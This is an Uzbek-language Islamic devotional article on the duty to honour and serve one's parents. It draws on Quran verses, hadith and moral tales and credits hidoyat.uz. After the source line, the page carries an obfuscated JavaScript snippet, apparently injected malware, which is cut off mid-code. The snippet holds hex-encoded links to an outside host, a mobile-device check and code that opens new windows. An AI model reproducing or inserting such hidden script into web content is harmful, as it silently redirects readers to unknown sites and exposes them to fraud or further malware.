Аллоҳ таоло инсонга ота-онаси билан яхши муносабатда бўлишни ва доим уларга яхшилик қилишни буюрди.

Қуръони каримда бундай марҳамат қилинади:

 «Раббингиз Унинг Ўзигагина ибодат қилишингизни ҳамда ота-онага яхшилик қилишни амр этди. (Эй инсон!) Агарулар­нинг бири ёки ҳариккиси ҳузурингда кексаликёшига етсауларга “уф!..” дема ва уларни жеркимаУларга (доимо) ёқимли сўзайтУларгамеҳрибонликбиланхорлик қанотинипаст тут ва (дуода) айт: “ЭйРаббимМени (улар) гўдаклик чоғимда тар­биялаганларидекСен ҳамуларга раҳм қилгин!» (Исро, 23–24)

“Уларга ёқимли сўз айт”дейилганида ота-онани номи билан чақирмаслик, балки “отажон, онажон” каби сўзлар билан ҳурмат­лаб муомала қилиш, уларни ранжитадиган гапларни гапирмас­лик, улар олдида ўзини қул ёки чўрилардек тутиш кабиларни ту­шу­ниш керак (“Мадорикуттанзил ва ҳақоиқуттаъвил” тафсири).

Ибн Аббос (розияллоҳу анҳу): “уларга “уф!..” демава уларни жеркима!”оятини шарҳлаб, айтади: “У нафрат сўзидир”.

Муқотил айтади: “У қўпол, ёмон сўзларни айтиш”.

Тарбия бериб, вояга етказган ота-онасининг меҳрибонли­ги­ни ва чеккан машаққатларини қадрлаши учун Аллоҳ таоло бандаларига буюради:

“…ва (дуода) айт: “Эй Раббим! Мени (улар)гўдаклик чоғимда тарбиялаганларидек, Сен ҳам уларга раҳм қилгин!”»

Аллоҳ таоло инсондаги ота-она ҳақи хусусида бундай деди:

Эсланг(Биз) Исроилавлодидан: “ФақатАллоҳгагина сиғинасизотаонақариндошетимва мискинларга яхшиликқиласизодамларгаширинсўз бўлингнамознибаркамол ўқингзакотберинг”, деб аҳд олганэдик» (Бақара, 83).

Ота-онага яхшилик қилиш амалларнинг яхшиси ва тоатлар­нинг энг улуғидир. Абдуллоҳ ибн Масъуд (розияллоҳу анҳу) ривоят қилади: “Ё Расулуллоҳ, энг яхши амал қайси?” деб сўрадим. Расу­луллоҳ (соллаллоҳу алайҳи ва саллам): “(Энг афзал амал) ўз вақти­да ўқиладиган намоздир”, дедилар. “Сўнг қайси?” деб сўрадим. “Ота-онага яхшилик қилиш”, дедилар.

Ота-онага яхшилик қилиш жаннатга олиб борувчи йўллардандир.

Абу Ҳурайра (розияллоҳу анҳу) ривоят қилади: «Расулуллоҳ (соллаллоҳу алайҳи ва саллам)дан ушбу сўзларни эшитдим: “Хор бўлсин! Хор бўлсин! Хор бўлсин!” “Ким у, ё Расулуллоҳ?” деб сў­рашди. “Ота-онасининг бирини ёки иккаласини қарилик чоғи­да топиб, уларга яхшилик қилиб жаннати бўлиб олмаган”, дедилар».

Ҳасан Басрий (раҳматуллоҳи алайҳ): “Ота-онага яхшилик қилиш Аллоҳга маъсият бўлмаган барча нарсада уларга итоат қи­лишдир. Ота-онага оқ бўлиш уларни қарилик чоғида қаровсиз ташлаб қўйиш ва яхшиликдан маҳрум қилишдир”, деди.

Пайғамбар (соллаллоҳу алайҳи ва саллам) ҳузурларига жи­ҳод қилиш учун рухсат сўраб келган бир киши қиссасини эслайлик.

Расулуллоҳ (соллаллоҳу алайҳи ва саллам) ундан: “Ота-онанг тирикми?” деб сўрадилар. У: “Ҳа”, деди. Пайғамбаримиз (алай­ҳиссалом): “Сен жидду жаҳд билан хизматларини адо эт”, дедилар.

Ҳар бир инсонга ота-онасига яхшилик қилиш ҳам фарз, ҳам қарздир. Ота-онага яхшилик қилиш ҳеч қачон уларга қарши чиқ­маслик, хизматларидан бўйин товламасликдир. Баъзилар ота-онага яхшилик фақат ўзига ёқадиган ишларда ва хоҳишига мувофиқ келган ўринларда деб ҳисоблайди. Ҳақиқатда эса, бундай эмас. Яхшилик фақат яхши амалларда, банданинг ҳавойи хоҳишларига хилоф нарсаларда бўлади. Агар уларнинг ҳавойи майлларига тўғри келадиган нарсада бўлганида эди, у яхшилик деб номланмасди. Аллоҳ таоло бандани ота-онага яхшилик қилиш ва улар ҳурматини жойига қўйишга буюради:

“Уларга, меҳрибонлик билан, хорлик қанотини паст тут ва (дуода) айт: «Эй Раббим! Мени (улар)гўдаклик чоғимда тарбия­лаганларидек, Сен ҳам уларга раҳм қилгин!”

Аллоҳ таоло айтади:

«Биз инсонни отаонасигаяхшилик қилишга буюрдикОнаси уни (қорнида) қийналиб кўтариб юрган вауни қий­налиб туққандирУнга ҳомиладорлик ва уни(сутдан) ажра­тиш(муддати) ўттиз ойдирБасқачону вояга етибқирқёшга тўлганида: “ЭйРаббимМенга ва отаонамга инъом этганнеъматингга шукр қилишгава Ўзинг рози бўладигансолиҳ амални қилишгамени муваффақ этгин вамен учун зурриё­тимниислоҳ этАлбаттаменСенга (гуноҳларимдан) тавба қил­дим ва албаттамен мусулмонларданман”, дейди» (Аҳқоф, 15).

Бақара сураси 233-оятда чақалоқ тўла икки йил эмизилиши белгилаб қўйилган. Ўттиз ойдан йигирма тўрт ой эмизишга кетса, олти ой қолади. Ҳомила одатда тўққиз ойда туғилса-да, бунинг энг кам муддати олти ой, кўп муддати эса, йигирма тўрт ой, дейиш­ган. Бу табобатда ҳам тасдиқланган.

Уламолар: “Бу оят Абу Бакр (розияллоҳу анҳу) ҳақларида нозил бўлган”, дейди. Бу оят у кишининг оталари Абу Қуҳофа, оналари Уммул Хайр, болалари ҳақига қилган дуолари ижобат бўлганидан дарак беради. Ўзи билан бирга ота-онаси ва ўғил-қизлари Исломни қа­бул қилган бошқа бирор саҳоба йўқ, бунга фақат Абу Бакргина мушарраф бўлган.

Али ибн Абу Толиб (каррамаллоҳу важҳаҳу) ривоят қилади. Расулуллоҳ (соллаллоҳу алайҳи ва саллам): “Мен ота-онасининг ҳа­қини адо этган кишидан хурсандман”, дедилар. Мен: “Ё Расу­луллоҳ! Агар унда (ота-она ҳақини адо этишда) ҳеч нарса бўлма­са-чи?” деб сўрадим. Пайғамбаримиз (алайҳиссалом): “Агар улар бир ишга буюрса, “хўп бўлади”, десин, “уф”, демасин. Уларга қат­тиқ гапирмасин, фақат яхши гапларни сўзласин”, дедилар.

Бир киши Пайғамбаримиз (соллаллоҳу алайҳи ва саллам) олди­ларига келиб: “Ё Расулуллоҳ, менга бир яхшиликни билдиринг, ундан дунёда ҳам, охиратда ҳам манфаат топай”, деди. “Ота-онанг борми?” деб сўраганларида, у: “Ҳа”, деб жавоб берди. Расулул­лоҳ (соллаллоҳу алайҳи ва саллам): “Ундай бўлса, уларнинг ҳақи­ни адо қил ва уларни овқатлантиргин. Уларга едирган ҳар бир луқ­манг учун жаннатда қаср бино қилинади”, дедилар. Яна бир саҳо­ба Пайғамбар (соллаллоҳу алайҳи ва саллам) олдиларига келиб: “Ё Расулуллоҳ, менинг онам бор ва унга нафақа қилиб тураман. У эса менга тили билан азият беради. Нима қилай?” деди. Расулул­лоҳ (соллаллоҳу алайҳи ва саллам): “Унинг ҳақини адо қил. Аллоҳга қасам, агар гўштингни кесиб берсанг ҳам, ҳақининг тўртдан би­рини адо қила олмайсан. Жаннат оналарнинг оёғи остида эка­нини бил­майсанми?” деб жавоб бердилар. Саҳоба: “Энди онамга асло ёмон гапирмайман”, деди ва онаси олдига келиб, оёқла­ри­ни ўпди.

Расулуллоҳ (соллаллоҳу алайҳи ва саллам) матни узун бир ҳадиснинг охирида айтганлар: “Мени ҳақ билан пайғамбар қилиб юборган Зотга қасам, кимга Аллоҳ таоло мол ато қилса, бу молидан у ота-онасига эҳсон берса, жаннатда мен билан бирга бўлади”. Бир киши: “Ё Расулуллоҳ, агар ота-онаси дунёдан ўтиб кетган бўлса-­чи?” деб сўради. Пайғамбар (соллаллоҳу алайҳи ва саллам): “Улар­нинг номидан садақа қилади, Қуръон ўқийди ва ҳақларига дуо қила­ди. Агар буларни тарк қилса, уларга оқ бўлади. Ким уларга оқ бўл­са, осий бўлибди”, деб жавоб бердилар.

Баъзилар: “Бир банда фарз намозини ўқиб, кетидан ота-она­си ҳақига мағфират сўраб дуо қилса, Аллоҳ таоло дуосини ижобат этиб, гарчи ота-онаси фосиқ бўлса ҳам, уларни мағфират қи­ла­ди”, деган.

Абу Зарр Ғифорий (розияллоҳу анҳу) ривоят қилади: «Мен Расулуллоҳ (соллаллоҳу алайҳи ва саллам)нинг бундай деганларини эшитганман: “Ким ота-онасини зиёрат қилиш учун йўл юрса, Аллоҳ унинг ҳар бир босган қадамига юзта савоб ёзиб, юзта гуноҳини ўчиради ва даражасини юз баравар кўтаради. Агар улар олдида яхши сўзларни айтса, қиёмат куни унга нур бўлади. Ота-онаси олдидан гуноҳлари кечирилган ҳолатда чиқади”».

Умар (розияллоҳу анҳу) даврида бир савдогар бор эди. Бир куни онаси унинг олдига келиб, ўзига зарур нарсани беришини сўради. Шунда савдогарнинг хотини: “Онанг бизнинг камбағал бў­лишимизни хоҳлаяпти, агар ҳар куни шундай сўрайверса, фақир бўлиб қоламиз”, деди ва савдогар унга ҳеч нарса бермагач, онаси йиғлаб, қайтиб кетди. Бир сафар савдогар тижорат иши би­лан йўл­га чиққанида, қароқчилар йўлини тўсди. Молларини тортиб олиш­ди-да, қўлини кесиб, бўйнига осиб кетишди. Шу ер­дан ўтаётган қавм уни кўриб, уйига олиб борди. Кўргани келган қа­риндошларига у: “Бу менинг жазоим. Агар онамга инфоқ-эҳ­сон қилганимда, қўлим ҳам, молим ҳам ўзимда қоларди”, деди.

Ҳикоя қилинишича, фазилати билан машҳур шайх Маккага сафарни қасд қилди. Аммо онаси бундан норози бўлди. Онаси унинг ортидан: “Парвардигоро, ўғлим мени айрилиқ ўти билан куй­дирди. Уни бу қилмиши учун жазолагин!” деб дуо қилди. Шайх шаҳарлардан бирига етгач, масжидга кириб, ибодат қила бош­ла­ди. Шу кеча бир кишининг уйига ўғри кирди. Уй эгаси ўғрининг мас­жид томон қочганини кўрди. Одамлар уни қувлай кетди, ле­кин ўғри масжиднинг олдига келганида кўздан ғойиб бўлди. Улар: “Мас­жид­га киргандир”, деб ичкарига қаради. На­моз ўқиётган шайх­ни ушлаб, шаҳар ҳокимининг олдига олиб бо­ришди. Ҳоким ўғри­нинг кўзини ўйиш, қўл-оёқларини кесишга буюрди. Жаллодлар ҳукмни ижро этди ва: “Бу ўғрининг жазо­си”, дея бозорда жар со­лишди. Шунда шайх: “Ундай деманглар! Бу онасининг рухсатисиз Каъ­бани та­воф қилиш учун чиққан кимсанинг жазосидир, деб айтинг­лар”, деди. Унинг шайх экани­ни билишгач, қилган ишларидан пушаймон бўлишди. Онаси олдига олиб келиб, остонага қўйиб кетишди. Уй ичидан эса онасининг ноласи эшитилди: “Парвардигоро, агар боламнинг бошига бир бало солсанг, сўнгра уни қайтарсанг, ўғлимни бир бор кўрсам”. Шунда шайх: “Мен оч мусофирман, мен­га овқат беринглар”, деди. Онаси: “Эшик олдига кел”, деди. У: “Менинг оёқларим йўқ”, деди. Онаси: “Бўлмаса, қўлингни чўз”, деди. “Чўзадиган қўлларим ҳам йўқ”, деди у. Онаси деди: “Мен сенга номаҳрам бўлсам, қандай қилиб сени овқатлантираман”. У: “Қўрқма, менинг кўзларим ҳам йўқ”, деди. Шунда онаси битта нон билан кўзачада сув олиб, унинг олдига келди. Шайх юзини онасининг оёғига қўйиб: “Мен сизнинг осий ўғлингизман”, деди. Онаси уни таниб, йиғлаб юборди ва: “Парвардигоро, агар ҳолат бун­дай бўлса, иккимизнинг ҳам жонимизни олгин, токи одамлар юзларимиз қоралигини кў­ришмасин”, деб нола қилди. Унинг но­ласи тугар-тугамас, Аллоҳ ҳар иккисининг жонини олди.

Анас ибн Молик (розияллоҳу анҳу) ривоят қилади. Расулуллоҳ (соллаллоҳу алайҳи ва саллам): «Ким ота-онасини норози қил­ган бўлса, шаҳодат калимасини айтолмай ўлади ва қабридан пешо­насига “Бу ота-онасига оқ бўлган кимсанинг жазосидир”, деб ёзил­ган ҳолатда туради», дедилар. Бошқа бир ҳадисда: “Кимга Аллоҳ таоло мол ато қилса-ю, у ота-онасининг ҳақини адо қил­маса, унинг амаллари бекор бўлади ва у қаттиқ азобланади”, де­йилган.

Имом Термизий Абдуллоҳ ибн Умар (розияллоҳу анҳу)дан ри­воят қилади: «Пайғамбар (соллаллоҳу алайҳи ва саллам): “Аллоҳ­нинг розилиги ота-онанинг розилигида, ғазаби ота-онанинг ға­забидадир”, дедилар».

“Саҳиҳи Бухорий”да келишича, Абдуллоҳ ибн Масъуд (рози­ял­лоҳу анҳу) айтади: «Расулуллоҳ (соллаллоҳу алайҳи ва саллам)­дан “Қайси амал Аллоҳга маъқулроқ?” деб сўрадим. “Ота-онага яхшилик қилиш”, дедилар. “Яна қайси амал?” деб сўрадим. Расу­лул­лоҳ (соллаллоҳу алайҳи ва саллам): “Аллоҳ йўлида ғазот қилиш”, дедилар. Шу аснода бир киши келиб, ғазотга чиқиш учун Расу­лул­лоҳ (соллаллоҳу алайҳи ва саллам)дан рухсат сўради. Пайғам­бар (сол­лаллоҳу алайҳи ва саллам): “Ота-онанг хизматини қил­санг, ға­зот қилган бўласан”, дедилар».

Ансорлардан бир киши келиб: “Ё Расулуллоҳ! Ота-онам ва­фот этганидан кейин ҳам уларга яхшилик қилишим керакми?” деб сўради. Пайғамбаримиз (соллаллоҳу алайҳи ва саллам): “Ҳа, тўрт нарса билан хизмат қилишинг керак: уларнинг ҳақига дуо қилиш, гуноҳларига истиғфор айтиш, уларнинг аҳдлари, ваъдаларини бажариш, уларнинг дўстларини ҳурмат қилиш”, дедилар.

Ота-она хизматини қилишда, уларнинг розилигини топишда сусткашлик қилиш ярамайди. Хизматларини адо этиш ва улар ҳақига раҳмат-мағфират тилаб, дуолар қилиш зарур! Шунда ҳам ота-онанинг ҳақларини тўлиқ адо эта олмайсиз. Лекин Аллоҳ та­о­ло оз амалларингизни барака билан кўпайтириб беради.

Ота-онага яхшилик қилишга Буюк Аллоҳ тарафидан амр-­фар­мон бўлишига қарамай, бу соҳадаги ўлчовларимиз бузилиб кет­ган. Гоҳо ошна-оғайниларини, хотини, фарзандларини ота-­она­сидан устун қўядиган кимсаларни учратамиз. Баъзилар ота-онага яхши­лик қилиш каби фазилати улуғ амалларни тарк этиб, ар­зи­мас иш­лар билан кифояланади. Баъзилар ота-онаси қариб қолга­нида ташлаб кетади ёки ота-онасини камдан-кам зиёрат қилади. Ота-онасига бақирадиган ёки қўпол муомала қиладиганлар ҳам бор. Айримлар кўча-кўйда бировларга хушомад қилади-ю, уйида кекса ота-онасига айтгани бир оғиз илиқ сўз тополмайди. Улар билан қўпол муомалада бўлади.

Бугун динимиз буйруқларига эътиборсизлик ва аёлларнинг фаоллашуви сабабли хотинини ота-онадан устун қўйиш ҳоллари кўпайди. Муоз (розияллоҳу анҳу) айтади: «Расулуллоҳ (соллаллоҳу алайҳи ва саллам) менга васият қилдилар: “Агар ота-онанг сенга аҳлинг (хотининг)дан ҳам, молингдан ҳам воз кечишингни буюришса ҳам, уларга итоат қил!”»

Эрини ота-онасига осий бўлишга ва қариндош-уруғчиликни узишга ундайдиган аёлда яхшилик йўқдир.

Абдуллоҳ ибн Умар (розияллоҳу анҳу) айтади: «Умар (розиял­лоҳу анҳу) аёлимни ёқтирмасди. Отам менга уни талоқ қил, деди. Мен бош тортдим. Умар (розияллоҳу анҳу) Пайғамбар (соллаллоҳу алай­ҳи ва саллам) ҳузурларига бориб, устимдан шикоят қилди. Пайғам­бар (соллаллоҳу алайҳи ва саллам: “Отангга итоат қил”, дедилар».

Абу Дардо (розияллоҳу анҳу) ҳузурларига бир киши келиб: “Онам хотинимни талоқ қилишимни буюряпти”, деди. Абу Дардо: «Расулуллоҳ (соллаллоҳу алайҳи ва саллам)дан: “Ота-она жаннат дарвозаларининг ўртасидадир. Агар хоҳласанг, бу дарвозани йўқ қиласан ёки сақлаб қоласан”, деганларини эшитганман», деди.

Киши ота-онасига роҳат-фароғатидан кечиб бўлса-да, яхшилик қилсин, итоат этсин. Ким бахт-саодат истаса, жаннат дарвозаларини бузиб ташламасин. Энди ким охиратини дунёга алмаштирса ва ўткинчи ҳаётни афзал билса, у жаннат дарвозасини бузиб ташлаган бўлади.

Юқоридаги ҳукмга кўра, агар аёл хулқи ёмон ва итоатсиз бўлса, ота-она ундан ажралишга буюрса, фарзанд итоат қилиши шарт. Аммо аёли яхши бўлса, ота-онаси мустаҳкам диндор бўлмаса, келиннинг диндорлиги туфайли талоқ қилишга буюрса, ўғил улар билан чиройли муомала қилади, хизматларини бажаради, аммо аёлини талоқ қилмайди. Аллоҳдан қўрқадиган муслима эрини ота-онасига яхшилик қилишга ундайди. У мана шу ишда Аллоҳ­дан савоб умид қилади. Ота-онани ҳурматлаш, уларнинг хизмат­ла­ри­ни қилиш улкан бойлик ва чиройли хулқлардандир.

Мужоҳид айтади: «Агар ота боласини ураман деб қўл кўтарса, бола отасининг қўлини қайтармасин. Ким ота-онасига хўмрайиб қараса, уларга яхшилик қилмабди. Ким уларга (Аллоҳга ва ота-онага осийлик қилиш билан) ғам келтирса, оқ бўлибди. Ота-она­га оқ бўлишдан эҳтиёт бўлинг. Расулуллоҳ (соллаллоҳу алайҳи ва саллам): “Уч нарса билан кишининг амаллари унга фойда бер­май­ди. Аллоҳга ширк келтириш, ота-онага оқ бўлиш, душман бос­ти­риб келганида урушдан қочиш”, деганлар».

Жуҳайма (розияллоҳу анҳу) Пайғамбар (соллаллоҳу алайҳи ва саллам) ҳузурларига келиб: “Ё Расулуллоҳ, жаҳд қилишни истаб, сиздан маслаҳат сўраб келдим”, деди. “Онанг борми?” дедилар. “Ҳа”, деди. “Онангни ёлғиз қолдирма. Чунки жаннат унинг оёғи остидадир”, дедилар.

Бир киши Расулуллоҳ (соллаллоҳу алайҳи ва саллам) ҳузур­ларига келиб: “Ё Расулуллоҳ, ҳижрат қилиш учун сизга байъат бергани келдим. Лекин ота-онам ортимдан йиғлаб қолди”, деди. Ра­сулуллоҳ (соллаллоҳу алайҳи ва саллам): “Қайтиб бор ва уларни қандай йиғлатган бўлсанг, шундай кулдиргин”, дедилар. Бошқа ривоятда: “Сен улар олдига қайтиб бориб, уларни йиғлат­ганинг­дек кулдирмагунингча, сендан байъат олмайман”, каби келган.

Қатодадан ривоят қилинади: “Бир кишининг онаси унга фақат фарз намозларини ўқийсан ва фақат Рамазон рўзасини тутасан, деб қасам ичирди. Шундай ҳолатда у онасига итоат қилади! Чунки онага итоат қилиш нафл ибодатлардан афзалдир.

Ҳишом ибн Ҳассон айтади: «Мен Ҳасанга: “Кечаси Қуръондан таълим оламан. Онам кечқурунги овқатда мени кутиб қолади”, дедим. Ҳасан: “Кечқурунги овқатни онанг билан егин, чунки онанг ёнида бўлиб, уни қувонтиришинг нафл ҳаж қилишингдан яхшидир”, деди».

Ибн Умар (розияллоҳу анҳу) онасини елкасида кўтариб, Каъбани тавоф қилаётган кишини кўрди. У киши: “Эй Ибн Умар, онамнинг ҳақини адо қилдимми?” деб сўради. Ибн Умар: “Сени туғишдаги тўлғоқларидан биттасининг ҳақини ҳам адо қилганинг йўқ. Лекин сен яхши иш қиляпсан. Аллоҳ камига ҳам кўп савоб беради”, деди.

Агар биров бизга бир-икки бор яхшилик қилса, уни мақтаб, яхшиликларини эслаб юрамиз. Ота-онамизга эса баъзан итоатсизлик ва қўпол муомала билан жавоб берамиз. Бошқаларнинг кўнглини олишга уринамиз-у, аммо не-не машаққатлар билан бизларни улғайтирган ота-онамизнинг кўнглини кўтариш, дилини шод қилишга эътибор бермаймиз. Бирор фарзанд отаси ёки онаси вафот этганида касал бўлиб қолганини кўрганмисиз? Ёқуб (алайҳиссалом) қиссасини бир эслайлик. Ўғли Юсуфдан айрилиш отага қандай таъсир қилганини хотирлаб, хулоса чиқарайлик.

Қуръони каримда бундай марҳамат қилинади:

«Кейин улардан юз ўгириб: “Эсизгина Юсуф!” дедиҒамғуссадан унингкўзлари оқариб (ожиз бўлиб) қолди ва у эндимаҳзундир» (Юсуф, 84).

Ёқуб (алайҳиссалом) саксон йил суюкли ўғли Юсуф (алай­ҳиссалом) фироқида йиғлайверганидан кўзлари оқариб, охири кўр бўлиб қолади. Бу йиғи сабрсизлик йиғиси бўлмай, инсонга Аллоҳ ато этган туғма табиат эди, оталик меҳри далолати эди. Муҳаммад (алайҳиссалом) ҳам Иброҳим исмли норасида ўғиллари вафот этганида кўзларига ихтиёрсиз ёш олганлари маълум.

Ота-онага оқ бўлишга уларни йиғлатиш, хафа қилиш, узоқ вақт зиёрат қилмаслик, саломатликлари ва моддий ҳолатларига эътибор бермаслик кабилар киради. Шунингдек, болалар Аллоҳга итоат қилмаслиги ва мункар ишларга берилиши ҳам ота-онани ғамга ботиради. Чунки бу ишлар ота-онага ёмон таъсир қилади. Кўпинча фарзандлар яхши мансабларга ва молу дунёга эга бўлганида шундай оқпадарлик қилади.

Бир киши Расулуллоҳ (соллаллоҳу алайҳи ва саллам) ҳузурла­рига келиб деди:

– Ё Расулуллоҳ! Инсонлар орасида менинг чиройли муомала қилишимга ким ҳақлироқ?

Расулуллоҳ (соллаллоҳу алайҳи ва саллам):

– Онанг, – дедилар.

– Сўнг ким? – деб сўради.

– Онанг, – дедилар.

– Сўнг ким? – деди.

– Онанг, – дедилар.

– Сўнг ким?

– Отанг, – дедилар.

Ибн Баттол айтади: “Она уч нарсада отадан фарқланиб, афзал туради: болани қорнида кўтариш қийинчилиги, тўлғоқ азоби ва эмизиш машаққати. Онанинг отадан олдин қўйилишида катта ҳикмат бор. Она ўзини боқадиган, яхшилик ва парвариш қиладиган кишига муҳтождир. Чунки у заифа, касби йўқ, эътибор ва раҳм-шафқатга муҳтождир.

Мусо (алайҳиссалом) Аллоҳ таолога жаннатда кимга қўшни бўлишини билдиришини сўраб, ёлборар эди.

Бир куни шундай нидо келди:

– Эй Мусо, фалон ерда яшовчи қассоб сенинг жаннатдаги қўшнинг бўлади…

Мусо (алайҳиссалом) қизиқиб, қассобнинг қайси ибодати учун бунга лойиқ бўлганини билиш ниятида йўлга чиқди. Мусо (алай­ҳиссалом) ўша одамни қидириб топди. Қассоб Мусо (алай­ҳисса­лом) ҳақ пайғамбар эканини билган, имон келтирган эди. Лекин ўзи­ни кўрмаган эди. Шунинг учун танимади. Кечқурун қас­соб Мусо (алайҳиссалом)ни уйига олиб кетди. Овқат тайёрлади. Дас­тур­хон тузади. Овқат ейишдан олдин, қассоб деворга осилган бир са­ват­ни ерга туширди ва ундан ҳатто ҳаракат қилишга ҳам ҳоли қол­ма­ган бир қари кампирни олди. Худди гўдакни овқат­лантиргандек унга едирди, ичирди ва яна саватга жойлаб, деворга осди. Шунда кам­пир нималардир деб шивирлади. Қари аёлнинг нима деяёт­га­ни­ни тушунмаган Мусо (алайҳиссалом) қассобдан сўради:

– Ўғлим, бу кампир киминг бўлади?

Қассоб мусофирга:

– Бу аёл онам бўладилар. Ўтириб-туришга, овқат ейишга ҳол­лари йўқ. Шу боис ўзим едираман, ичираман ва тозалигига қа­райман. Қўлимдан келганича хушнуд этишга ҳаракат қиламан.

Мусо (алайҳиссалом):

– Ҳозиргина у сенга гапиргандай бўлди, нималар деди?

Қассоб:

– Эй Раббим! Мен ўғлимдан хурсандман. Сен ҳам ундан рози бўл. Жаннатда уни Мусо (алайҳиссалом)га қўшни қил, деб дуо қил­ди. Шунда Мусо (алайҳиссалом) ўзини танитадиган вақт келгани­ни тушунди ва:

– Мен Аллоҳнинг пайғамбари Мусо бўламан. Аллоҳдан жаннат­даги қўшним ким бўлишини билдиришини илтижо қилган эдим. Аллоҳ сен эканингни билдирди. Сенга хушхабар бўлсин: онангга қилган хизматинг учун Аллоҳ сендан рози бўлди. Онангнинг дуосини қабул айлади, – деб марҳамат қилди.

Ота-она дунёдан ўтганларидан кейин уларнинг ҳақларига раҳ­мат ва мағфират сўраб дуо қилиш, уларнинг васиятларини ба­жариш, шунингдек, улар номидан садақа қилиш ва уларнинг қариндош-уруғлари билан борди-келди қилиш фазилатли ишлар­дандир. Бир ансорий Расулуллоҳ (соллаллоҳу алайҳи ва сал­лам)­дан: “Ё Расулуллоҳ, ота-онам бу дунёдан ўтиб кетганларидан ке­йин уларга қандай яхшилик қилишим мумкин?”, деб сўради. Расулуллоҳ (соллаллоҳу алайҳи ва саллам): “Тўрт амал бор: улар­нинг ҳақларига дуо қилиш ҳамда истиғфор айтиш; аҳдларини ба­жариш; уларнинг дўстларини ҳурмат қилиш; ота-онанг яхши­лик қиладиган кишилар билан силаи раҳм, яъни қариндошчи­лик­ни боғлаш. Мана шу ишлар вафотларидан кейин ҳам уларга қи­ла оладиган яхшиликларингдир”, дедилар.

Биз Аллоҳ китобидан, Пайғамбаримиз(соллаллоҳу алайҳи ва сал­лам)  суннатларидан васиятда айтилган насиҳатга қулоқ тутайлик:

– Ота-онамиз ёнимизда эканида, соч-соқоллари оқариб, белла­ри букилганида, қўл-оёқлари қалтираб, қийинчилик билан туриб, машаққат билан ўтирганида, хасталиклар кела бошлаганида уларга яхши муомaлада бўлайлик. Кўнгилларини кўтарайлик, хушнуд этайлик. Уларга молимиз ва кучимизни сарфлашда бахиллик қилмайлик. Улар билан ҳаётимизни чиройли ўтказайлик.

Манба: hidoyat. uz

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const 